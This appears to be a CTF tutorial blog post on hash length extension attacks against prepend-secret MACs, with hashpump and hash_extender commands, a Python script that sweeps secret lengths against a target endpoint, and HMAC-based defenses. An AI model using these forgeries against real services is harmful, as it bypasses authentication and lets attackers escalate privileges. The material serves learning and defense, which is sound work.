Hash Length Extension Attacks for CTF: Forging a MAC Without the Secret

Can you forge a MAC without knowing the secret?

If a service authenticates messages by computing signature = hash(secret || message) with a plain Merkle-Damgard hash (MD5, SHA-1, SHA-256), then yes. You can take a message and its valid signature, append your own bytes to the message, and compute a valid signature for the new, longer message without ever knowing the secret. This is the hash length extension attack, and it is one of the highest-reward bugs in CTF crypto and web categories because it looks like a real authentication scheme and is not one.

The digest of a Merkle-Damgard hash is not a fingerprint. It is a saved checkpoint of the machine. Hand someone the checkpoint and they can keep running the machine from where you stopped.

Everything you need to pull it off:

The original message (the known, signed data).
The original signature (the hex digest the server handed you).
The bytes you want to append (for example &admin=true).
The length of the secret in bytes. You do not know it, but you can brute force it in seconds.

Feed those to hashpump or hash_extender and the tool prints a new message and a new signature that the server will accept. The rest of this post explains why this works, how to run it, how to handle the unknown secret length, and why HMAC and SHA-3 make the whole attack disappear. If you want to first confirm which hash you are looking at, the on-site hash identifier tells you whether a digest is MD5, SHA-1, or SHA-256 from its length alone.

Note: This attack is about forging a signature, not recovering the secret or reversing the hash. If your goal is to recover a password behind a hash, that is a different job covered in the Hash Cracking guide. Length extension never learns the secret; it just keeps hashing past it.

Why does a plain hash leak its own internal state?

MD5, SHA-1, and SHA-256 are all built on the Merkle-Damgard construction. The hash holds a fixed-size internal state (for SHA-256 that is eight 32-bit words, 256 bits total). It chops the input into fixed-size blocks (64 bytes for all three of these), and for each block it runs a compression function that mixes the block into the state. When the input runs out, it appends padding, processes the final block, and outputs the state as the digest.

The structure looks like this:

state = IV                       # fixed initialization vector
for block in blocks(message + padding):
    state = compress(state, block)
digest = state                   # <-- the output IS the final state

Read that last line again. The digest is a verbatim copy of the internal state after the last block. There is no final scrambling step that hides it, no key folded in at the end. So when the server hands you a hex digest, it has handed you the exact register contents the compression function would be sitting on if it were about to process one more block.

Key insight: To resume hashing you need two things: the state to resume from, and the byte count already consumed (so the padding lands in the right place). The digest gives you the state for free. The byte count is just len(secret) + len(message) + len(original_padding), and the only unknown in it is the secret length. That single unknown is the entire difficulty of the attack, and it is small enough to brute force.

The padding is the other half of the trick, so it is worth seeing exactly. Merkle-Damgard padding (the "MD strengthening" scheme) appends a single 0x80 byte, then enough 0x00 bytes to leave room, then the total bit length of the input as a 64-bit integer, so the whole thing is a multiple of 64 bytes:

# message = b'COMMAND=getbalance'  (18 bytes)  with a 14-byte secret
# the hash actually processed: secret(14) || message(18) = 32 bytes of data
padding = b'\x80' + b'\x00' * 23 + struct.pack('>Q', 256)  # 32-byte message = 256 bits, big-endian length
#         glue byte   zero fill        64-bit big-endian bit length
# 32 data bytes + 32 padding bytes = 64 = exactly one block

That padding (the 0x80, the zeros, and the length field) is called the glue padding. It is part of what got hashed to produce the signature you hold, so it becomes part of the message you forge. The server computed the digest over secret || message || glue_padding as a complete block, and your forged message will contain that glue verbatim.

What exactly is the vulnerable pattern?

The bug is the construction MAC = hash(secret || message), where || is concatenation. A developer wants to stop clients from tampering with a query string, a cookie, or an API parameter, so they prepend a server-only secret and hash the whole thing. The client gets the message plus the hash. To verify, the server recomputes hash(secret || message) and compares.

It feels airtight. The client never sees the secret, and changing a single byte of the message produces a wildly different hash. The flaw is that the attacker does not need to keep the hash the same. They are allowed to extend the message, and the construction lets them compute the new hash for the extended message for free.

A canonical vulnerable endpoint looks like this:

GET /api?user=guest&role=user&mac=df3e... HTTP/1.1
# server side, in pseudo-python:
def verify(query, mac):
    expected = sha256(SECRET + query).hexdigest()   # secret || message
    return hmac_unsafe_equals(expected, mac)        # plain hash, not HMAC
# if it parses the LAST value of a repeated key, appending
#   &role=admin
# to the query overrides role=user, and length extension
# produces a mac the server will accept.

Warning: Two things make a target exploitable beyond just using a plain hash. First, the secret must be prepended, not appended. hash(message || secret) is not vulnerable to this attack. Second, your appended bytes have to actually change the server's decision after it parses the message. The glue padding (raw 0x80 and null bytes) ends up in the middle of your forged message, so the parser has to tolerate or ignore it. Query strings, cookies, and many ad-hoc serialization formats do tolerate it.

How does length extension forge a valid MAC?

Here is the whole attack in one breath. The server computed signature = hash(secret || message). That signature is the hash's internal state right after it absorbed secret || message || glue_padding. You load that state back into a fresh hash object, tell it how many bytes it has "already" processed, and feed it your append bytes. The hash continues as if it had been computing secret || message || glue_padding || append all along, and it outputs a valid signature for exactly that string.

Step by step:

Take the known signature and split it back into the hash's state words (8 words for SHA-256, 5 for SHA-1, 4 for MD5).
Reconstruct the glue padding that the original secret || message block would have used. This needs the secret length, which you guess.
Build the forged message as message || glue_padding || append. This is the data the server will think it signed.
Resume the hash from the loaded state, with its length counter preset to len(secret) + len(message) + len(glue_padding) bytes, and absorb append. The output is the forged signature.
Send forged_message and forged_signature to the server. It computes hash(secret || forged_message) and gets the same value, because that is exactly the computation you just continued.

A minimal hand-rolled version against SHA-1 makes the mechanism concrete. The library here is pure-sha1-style code that exposes the state and prelength; the real tools below do all of this for you, but seeing it once removes the magic:

from pwn import *                 # pwnlib has a length-extension helper too
orig_msg  = b'user=guest&role=user'
orig_sig  = '6b9e...'             # hex digest from the server (SHA-1, 40 chars)
append    = b'&role=admin'
guess_len = 14                    # guessed secret length in bytes
# 1) load the digest back into the SHA-1 state, set the byte counter
h = SHA1_from_state(bytes.fromhex(orig_sig))
h.set_processed_length(guess_len + len(orig_msg))   # data before glue
# 2) the library appends correct glue padding for that length, then our bytes
glue = sha1_padding(guess_len + len(orig_msg))
forged_msg = orig_msg + glue + append
forged_sig = h.update(append).hexdigest()
print(forged_msg)                 # send this as the message
print(forged_sig)                 # send this as the mac

Notice what never appears in that script: the secret's value. Only its length matters, and only because the length determines where the glue padding falls. The secret could be a 14-character passphrase or 14 bytes of random key material; the forgery is identical either way.

How do you run it with hashpump or hash_extender?

Nobody hand-rolls the state surgery in a CTF. Two tools own this attack: hash_extender (the reference implementation, supports MD4, MD5, RIPEMD-160, SHA-0, SHA-1, SHA-256, SHA-512, WHIRLPOOL) and hashpump (simpler interface, MD5 and the SHA family). Both take the same four inputs and print the forged message and forged signature.

hash_extender with explicit flags:

$ hash_extender \
    --data 'user=guest&role=user' \
    --secret 14 \
    --append '&role=admin' \
    --signature 6b9e1f...c0 \
    --format sha256 \
    --out-data-format html
Type: sha256
Secret length: 14
New signature: 2f5d9c7a...e41b
New string: user%3dguest%26role%3duser%80%00%00...%01%70%26role%3dadmin

The --out-data-format html flag URL-encodes the raw glue bytes so you can paste the result straight into a query string. Use hex if you need to post-process it, or cgi for cookie contexts. The New string is your forged message and New signature is the MAC to send alongside it.

hashpump does the same job with a terser interface:

$ hashpump \
    -s 6b9e1f...c0 \               # original signature
    --data 'user=guest&role=user' \
    -a '&role=admin' \             # data to append
    -k 14                          # key (secret) length in bytes
2f5d9c7a...e41b                    # forged signature (stdout line 1)
user=guest&role=user\x80\x00...&role=admin   # forged message (line 2)

Tip: hashpump infers the hash algorithm from the length of the signature you pass to -s: 32 hex chars means MD5, 40 means SHA-1, 64 means SHA-256. If you are not sure what you are holding, run it through the hash identifier first so you pick the right --format for hash_extender.

The output message contains literal high bytes (0x80 and nulls). When you put it on the wire, encode it the way the target expects: percent-encoding for URLs and cookies, raw bytes for a binary protocol. A mismatch here (sending the literal text \x80 instead of the byte) is the single most common reason a correct forgery gets rejected.

What if you do not know the secret length?

You usually do not. The secret length is the one unknown the attack needs, and it is bounded: almost every real secret is between 4 and 64 bytes. So you do not guess, you sweep. Generate a forgery for every candidate length, send each one, and keep the response the server accepts. One of them is correct, and the server itself tells you which.

A length sweep with hashpump driven from Python:

import subprocess, urllib.parse, requests
ORIG_SIG  = '6b9e1f...c0'
ORIG_DATA = 'user=guest&role=user'
APPEND    = '&role=admin'
URL       = 'https://target.ctf/api'
for keylen in range(1, 65):                 # sweep candidate secret lengths
    out = subprocess.run(
        ['hashpump', '-s', ORIG_SIG, '--data', ORIG_DATA,
         '-a', APPEND, '-k', str(keylen)],
        capture_output=True, text=True).stdout.splitlines()
    forged_sig = out[0]
    forged_msg = out[1].encode().decode('unicode_escape').encode('latin-1')
    forged_qs  = urllib.parse.quote(forged_msg)   # URL-encode the raw bytes
    r = requests.get(f'{URL}?{forged_qs}&mac={forged_sig}')
    if 'Welcome admin' in r.text or r.status_code == 200:
        print(f'[+] secret length = {keylen}')
        print(r.text)
        break

The same loop works with hash_extender by swapping the subprocess call for hash_extender --secret {keylen} ... and parsing its New signature / New string lines. Sixty-four requests is nothing; the sweep finishes faster than reading this paragraph.

Note: If the service gives no clear success signal, look for a difference in length, status code, or timing between the rejected attempts and the accepted one. A correct forgery changes the server's parse of the message, so a 200/403 split or a different response body is the usual tell. When even that is hidden, the Cookies and JWTs guide covers the same oracle-hunting mindset for signed tokens, which is the web context where prepend-secret MACs show up most.

Why are HMAC and SHA-3 immune?

The attack works because the digest equals the final internal state and you can resume from it. Kill either of those properties and the attack dies. HMAC and SHA-3 each kill one.

HMAC (defined in RFC 2104) wraps the hash in two keyed passes:

HMAC(K, m) = H( (K xor opad) || H( (K xor ipad) || m ) )
#  inner hash:  H((K xor ipad) || m)   -> produces a digest
#  outer hash:  H((K xor opad) || inner_digest)  -> final MAC

When you length-extend the inner hash, you can predict the inner digest's extended state, but that value is then fed through a second hash keyed with K xor opad. You do not know K, so you cannot compute the outer hash, and the MAC you control is the outer one. The resumable state you captured never reaches the output. That nested keyed structure is the entire reason HMAC exists, and it is why every signing scheme that matters uses HMAC-SHA256 rather than SHA256(secret || message).

SHA-3 (Keccak) is immune for a different reason: it is not Merkle-Damgard at all. It uses a sponge construction with a large internal state, only part of which (the rate) is exposed as output; the rest (the capacity) is never revealed. The digest is not the full internal state, so you cannot reload the machine from it. Resuming is impossible because the bytes you would need to resume were never output. BLAKE2 and BLAKE3 are likewise immune, as are the truncated SHA-2 variants SHA-512/224 and SHA-512/256, because truncation hides part of the final state.

Length extension is not a weakness in SHA-256. It is a weakness in using SHA-256 as if it were a MAC. The fix is not a stronger hash; it is HMAC.

How do you defend against it (and spot it in review)?

The defense is one line. Never authenticate with a bare hash. Use HMAC with a dedicated key:

# vulnerable
mac = hashlib.sha256(secret + message).hexdigest()
# safe
import hmac, hashlib
mac = hmac.new(secret, message, hashlib.sha256).hexdigest()
# verify in constant time, always
ok = hmac.compare_digest(mac, provided_mac)

Other constructions that close the hole, in rough order of preference: use HMAC (the default answer); switch to a length-extension-resistant hash like SHA-3, BLAKE2/BLAKE3, or a truncated SHA-512 variant; or, if you are stuck with a Merkle-Damgard hash and no HMAC, append the secret instead of prepending and also hash twice (hash(secret || hash(secret || message)), which is essentially a hand-rolled HMAC). The clean choice is always HMAC, because the others are easy to get subtly wrong.

Tip: In code review, grep for the pattern directly. Any of sha256(secret + data), md5(key + msg), or sha1(SECRET . $payload) where the result is later treated as a signature is the smell. The tell is a hash function with a secret as the first argument and the result compared against client-supplied data. If you see it, you have found the bug.

Quick reference

Is it exploitable?

The MAC is hash(secret || message) with MD5, SHA-1, or SHA-256 (check the digest length: 32, 40, or 64 hex chars).
The secret is prepended, not appended. Appended secret is not vulnerable.
You can see one valid (message, signature) pair.
Your appended bytes (plus the raw glue padding) survive the server's parser and change its decision.

Tool cheat sheet

# hash_extender (explicit, many algorithms)
hash_extender --data DATA --secret LEN --append APP \
    --signature SIG --format sha256 --out-data-format html
# hashpump (terse, infers algo from signature length)
hashpump -s SIG --data DATA -a APP -k LEN
# unknown secret length? sweep 1..64 and let the server pick
for k in $(seq 1 64); do hashpump -s SIG --data DATA -a APP -k $k; done

For the neighboring techniques: recovering the secret behind a hash is the Hash Cracking guide; attacking signed web tokens and cookies is the Cookies and JWTs guide; and the symmetric encryption that often sits next to these MACs is the AES for CTF guide.

The whole attack fits on a sticky note: if a server signs with hash(secret || message), the signature is a checkpoint, and a checkpoint is an invitation to keep going.